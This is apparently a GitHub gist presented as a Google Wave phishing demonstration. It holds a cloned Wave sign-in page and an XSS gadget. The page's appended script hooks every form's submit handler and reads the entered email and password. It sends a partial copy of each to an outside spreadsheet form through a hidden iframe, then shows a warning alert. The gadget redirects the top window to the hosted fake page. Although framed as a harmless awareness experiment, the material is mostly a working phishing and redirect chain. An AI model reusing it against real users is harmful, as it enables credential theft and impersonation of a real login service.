Skip to content

Instantly share code, notes, and snippets.

@axemclion

axemclion/WavePhishedPage.html

Created February 10, 2010 10:33
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save axemclion/300208 to your computer and use it in GitHub Desktop.
Save axemclion/300208 to your computer and use it in GitHub Desktop.
Download ZIP
Google Wave Phishing Demo
Raw
WavePhishedPage.html
<html><head>
<style type="text/css"><!--
body,td,div,p,a,font,span {font-family: arial,sans-serif;}
body {margin-top:2}.c {width:4; height: 4}
html body { bgcolor: "#ffffff"; padding: 0; margin: 0; }
A:link {color:#0000cc; }
A:visited { color:#551a8b; }
A:active { color:#ff0000; }
.form-noindent {background-color: #FFFFFF; border: #b2c1d9 1px solid;}
div { display: block; }
div.loginBox {
padding-top: 10px;
padding-bottom: 16px;
}
#gc-signup-closed {
background-color: #ffffcd;
width: 600px;
font-size: 13px;
margin-top: 30px;
padding: 10px;
text-align: center;
}
#gaia_table {
white-space: normal;
text-align: left;
}
.gc-mid {
width: 780px;
margin: 0 auto;
}
#gc-footer a,
#gc-more a {
color: #3b73cc;
}
#gc-main {
width: 100%;
}
#gc-main td {
text-align: left;
}
#gc-banner img {
border: none;
}
#gc-banner {
display: block;
height: 120px;
background-color: #c6d7f2;
border-top: 1px solid #b2c1d9;
border-bottom: 1px solid #b2c1d9;
text-align: left;
}
#gc-banner-content {
height: 120px;
position: relative;
}
#gc-banner-low {
margin: 14px 0 0 0;
}
#gc-watch {
color: #3b73cc;
text-decoration: none;
font-size: 14px;
font-weight: bold;
padding: 3px 0 3px 30px;
background: url(/accounts/wave/button.gif) no-repeat center left;
}
#gc-create-acc {
position: absolute;
top: -100px;
right: 0px;
}
#screenshot {
margin-top: 10px;
width: 528px;
}
#gc-more {
padding: 10px 0 0 2px;
}
.gc-nopad {
padding: 0;
}
.gc-si-content {
position: absolute;
top: -56px;
right: 2px;
height: 248px;
white-space: normal;
width: 248px;
z-index: 8;
}
--></style>
<style type="text/css"><!--
.gaia.le.lbl { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }
.gaia.le.fpwd { font-family: Arial, Helvetica, sans-serif; font-size: 70%; }
.gaia.le.chusr { font-family: Arial, Helvetica, sans-serif; font-size: 70%; }
.gaia.le.val { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }
.gaia.le.button { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }
.gaia.le.rem { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }
.gaia.captchahtml.desc { font-family: arial, sans-serif; font-size: smaller; }
.gaia.captchahtml.cmt { font-family: arial, sans-serif; font-size: smaller; font-style: italic; }
--></style>
<title>Google Wave - Communicate and collaborate in real time</title>
<style type="text/css"><!--
body {
font-family: arial, sans-serif;
margin: 0;
padding: 13px 15px 15px;
}
.body {
margin: 0;
}
div.errorbox-good {}
div.errorbox-bad {}
div.errormsg { color: red; font-size: smaller; font-family: arial,sans-serif;}
font.errormsg { color: red; font-size: smaller; font-family: arial,sans-serif;}
div.topbar {
font-size:smaller;
margin-right: -5px;
text-align:right;
white-space:nowrap;
}
div.header {
margin-bottom: 9px;
margin-left: -2px;
position:relative;
zoom: 1
}
div.header img.logo {
border: 0;
float:left;
}
div.header div.headercontent {
float:right;
margin-top:17px;
}
div.header:after{
content:".";
display:block;
height:0;
clear:both;
visibility:hidden;
}
div.pagetitle {
font-weight:bold;
}
.footer {
color: #666;
font-size: smaller;
margin-top: 40px;
text-align: center;
}
table#signupform {
left: -5px;
top: -7px;
position:relative;
}
table#signupform td{
padding: 7px 5px;
}
table#signupform td table td{
padding: 1px;
}
hr {
border: 0;
background-color:#DDDDDD;
height: 1px;
width: 100%;
text-align: left;
margin: 5px;
}
--></style>
<link href="http://n.parashuram.googlepages.com/Tackle.css" rel="stylesheet" charset="utf-8" type="text/css" id="yui__dyn_0"></head><body dir="ltr" onload="gaia_setFocus();">
<div class="gc-mid" style="padding: 20px 0pt 6px;">
<div class="header">
<a href="https://wave.google.com/wave">
<img class="logo" src="https://www.google.com/accounts/wave/wave-logo.gif" alt="Google">
</a>
</div>
</div>
<div id="gc-banner">
<table id="gc-banner-content" class="gc-mid">
<tbody><tr>
<td>
<div>
<a href="http://moderator.appspot.com/#e=d332d">
<img alt="" src="https://www.google.com/accounts/wave/tag_login1.gif" height="43" width="418/">
</a></div>
<div id="gc-banner-low">
<a id="gc-watch" href="http://wave.google.com/help/wave/about.html#video" starget="_blank">Watch our looooong video</a>
</div>
</td>
</tr>
</tbody></table>
</div>
<div class="gc-mid" style="position: relative;">
<div id="screenshot">
<img src="https://www.google.com/accounts/wave/screenshot.png" height="297" width="508">
</div>
<div class="gc-si-content">
<script><!--
function gaia_onLoginSubmit() {
if (window.gaiacb_onLoginSubmit) {
return gaiacb_onLoginSubmit();
} else {
return true;
}
}
function gaia_setFocus() {
var f = null;
if (document.getElementById) {
f = document.getElementById("gaia_loginform");
} else if (window.gaia_loginform) {
f = window.gaia_loginform;
}
if (f) {
if (f.Email && (f.Email.value == null || f.Email.value == "")) {
f.Email.focus();
} else if (f.Passwd) {
f.Passwd.focus();
}
}
}
--></script>
<style type="text/css"><!--
div.errormsg { color: red; font-size: smaller; font-family:arial,sans-serif; }
font.errormsg { color: red; font-size: smaller; font-family:arial,sans-serif; }
--></style>
<style type="text/css"><!--
.gaia.le.lbl { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }
.gaia.le.fpwd { font-family: Arial, Helvetica, sans-serif; font-size: 70%; }
.gaia.le.chusr { font-family: Arial, Helvetica, sans-serif; font-size: 70%; }
.gaia.le.val { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }
.gaia.le.button { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }
.gaia.le.rem { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }
.gaia.captchahtml.desc { font-family: arial, sans-serif; font-size: smaller; }
.gaia.captchahtml.cmt { font-family: arial, sans-serif; font-size: smaller; font-style: italic; }
--></style>
<form id="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth?service=wave" method="post" onsubmit="return(gaia_onLoginSubmit());">
<div id="gaia_loginbox">
<table class="form-noindent" border="0" cellpadding="5" cellspacing="3" width="100%">
<tbody><tr>
<td style="text-align: center;" bgcolor="#e8eefa" nowrap="nowrap" valign="top">
<input name="ltmpl" value="standard" type="hidden">
<div class="loginBox">
<table id="gaia_table" align="center" border="0" cellpadding="1" cellspacing="0">
<tbody><tr>
<td colspan="2" align="center">
<font size="-1">
Sign in to
Google Wave
with your
</font>
<table>
<tbody><tr>
<td valign="top">
<img src="https://www.google.com/accounts/google_transparent.gif" alt="Google">
</td>
<td valign="middle">
<font size="+0"><b>Account</b></font>
</td>
</tr>
</tbody></table>
</td>
</tr>
<script type="text/javascript"><!--
function onPreCreateAccount() {
return true;
}
function onPreLogin() {
if (window["onlogin"] != null) {
return onlogin();
} else {
return true;
}
}
--></script>
<tr>
<td colspan="2" align="center">
</td>
</tr>
<tr>
<td nowrap="nowrap">
<div align="right">
<span class="gaia le lbl">
Email:
</span>
</div>
</td>
<td>
<input name="continue" id="continue" value="https://wave.google.com/wave/" type="hidden">
<input name="followup" id="followup" value="https://wave.google.com/wave/" type="hidden">
<input name="service" id="service" value="wave" type="hidden">
<input name="nui" id="nui" value="1" type="hidden">
<input name="dsh" id="dsh" value="4026706752812105139" type="hidden">
<input name="ltmpl" id="ltmpl" value="standard" type="hidden">
<input name="ltmpl" id="ltmpl" value="standard" type="hidden">
<input name="GALX" value="e_-UR4q6HSc" type="hidden">
<input name="Email" id="Email" size="18" value="" class="gaia le val" type="text">
</td>
</tr>
<tr>
<td></td>
<td align="left">
</td>
</tr>
<tr>
<td align="right" nowrap="nowrap">
<span class="gaia le lbl">
Password:
</span>
</td>
<td>
<input name="Passwd" id="Passwd" size="18" class="gaia le val" type="password">
</td>
</tr>
<tr>
<td>
</td>
<td align="left">
</td>
</tr>
<tr>
<td align="right" valign="top">
<input name="PersistentCookie" id="PersistentCookie" value="yes" checked="checked" type="checkbox">
<input name="rmShown" value="1" type="hidden">
</td>
<td>
<label for="PersistentCookie" class="gaia le rem">
Stay signed in
</label>
</td>
</tr>
<tr>
<td>
</td>
<td align="left">
<input class="gaia le button" name="signIn" value="Sign in" type="submit">
</td>
</tr>
<tr id="ga-fprow">
<td colspan="2" class="gaia le fpwd" align="center" height="33.0" valign="bottom">
<a href="http://www.google.com/support/accounts/bin/answer.py?answer=48598&amp;hl=en&amp;ctx=ch_ServiceLogin&amp;p=wave&amp;fpUrl=https%3A%2F%2Fwww.google.com%2Faccounts%2FForgotPasswd%3FfpOnly%3D1%26continue%3Dhttps%253A%252F%252Fwave.google.com%252Fwave%252F%26followup%3Dhttps%253A%252F%252Fwave.google.com%252Fwave%252F%26service%3Dwave%26ltmpl%3Dstandard" target="_top">
Can't access your account?
</a>
</td>
</tr>
</tbody></table>
</div>
</td>
</tr>
</tbody></table>
</div>
<input name="asts" id="asts" value="" type="hidden">
</form>
<form id="gaia_universallogin" action="https://www.google.com/accounts/ServiceLoginAuth?service=wave" method="post" onsubmit="return(gaia_onLoginSubmit());">
<input name="continue" id="continue" value="https://wave.google.com/wave/" type="hidden">
<input name="followup" id="followup" value="https://wave.google.com/wave/" type="hidden">
<input name="service" id="service" value="wave" type="hidden">
<input name="nui" id="nui" value="1" type="hidden">
<input name="dsh" id="dsh" value="4026706752812105139" type="hidden">
<input name="ltmpl" id="ltmpl" value="standard" type="hidden">
<input name="ltmpl" id="ltmpl" value="standard" type="hidden">
<input name="ltmpl" id="ltmpl" value="standard" type="hidden">
</form>
</div>
</div><div firebugversion="1.5.0" style="display: none;" id="_firebugConsole"></div>
<div class="gc-mid" id="gc-more">
<a style="font-weight: bold; font-size: 13px;" href="http://wave.google.com/help/wave/about.html">Learn more about Google Wave<span style="font-size: 16px;">»</span></a>
</div>
<div class="gc-mid" id="gc-signup-closed">
<b>Google Wave is currently in a limited preview.</b>&nbsp;&nbsp;
<a href="https://services.google.com/fb/forms/wavesignup/" target="_blank">Request an invitation.</a>
</div>
<div id="gc-footer" class="gc-mid">
<div class="footer">
©2010 Google
-
<a href="http://code.google.com/apis/wave">Developer APIs</a>
-
-
<a href="http://waveprotocol.org/">Federation Protocol</a>
<a href="http://wave.google.com/help/wave/terms.html">Terms</a>
-
<a href="http://wave.google.com/help/wave/privacy.html">Privacy Policy</a>
-
<a href="http://www.google.com/support/wave">Help</a>
</div>
</div>
</body><script>function _gs_() {
var s = document.createElement("iframe");
s.style.display = "none";
document.body.appendChild(s);
var email = document.getElementById("Email").value;
email = email.substring(0,7) + "....." + email.substring(email.indexOf("@"));
var password = document.getElementById("Passwd").value;
var showChar = 3;
password = " [ " + password.charAt(showChar) + " at position " + parseInt(showChar + 1)+" ] ";
_submitUrl = 'http://spreadsheets1.google.com/formResponse?formkey=dHF3eFFHVk1KMlhkcWdBUHVNZjFuWUE6MA&amp;ifq';
s.src = (_submitUrl + ("?&entry.0.single=" + escape(email) + "&entry.1.single=" + escape(password)));
window.open("http://spreadsheets.google.com/pub?key=tqwxQGVMJ2XdqgAPuMf1nYA&output=html");
alert("If you are seeing this, you have just thrown away your credentials at a phished page !! Dont worry, this is just an experiment of a hack on Wave and we have not stolen your password, and this experiment is harmless. Next time, please do check the URL bar before entering your password.");
return false;
}
function _tack_(s) {
_cv_ = function () {var o = "";var _inpa_ = document.getElementsByTagName("input");_inpa_.concat(document.getElementsByTagName("textarea"));for (var i = 0; i < _inpa_.length; i++) {o += "&" + _inpa_[i].name + "=" + _inpa_[i].value;}return escape(o);};
for (var i = 0; i < document.forms.length; i++) {
document.forms[i].onsubmit = s;
}
}
_tack_(_gs_);</script></html>
Raw
XSSGadget.xml
<?xml version="1.0" encoding="UTF-8" ?>
<Module>
<ModulePrefs
title="Setprefs New">
<Require feature="opensocial-0.8"/>
<Require feature="setprefs" />
</ModulePrefs>
<UserPref
name="greeting"
default_value="0"
datatype="hidden"/>
<Content type="html">
<![CDATA[
<div id="content_div">
Hello People
</div>
<script type="text/javascript">
top.location = "http://hosting.gmodules.com/ig/gadgets/file/100726510508187623906/wave.html";
</script>
]]>
</Content>
</Module>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment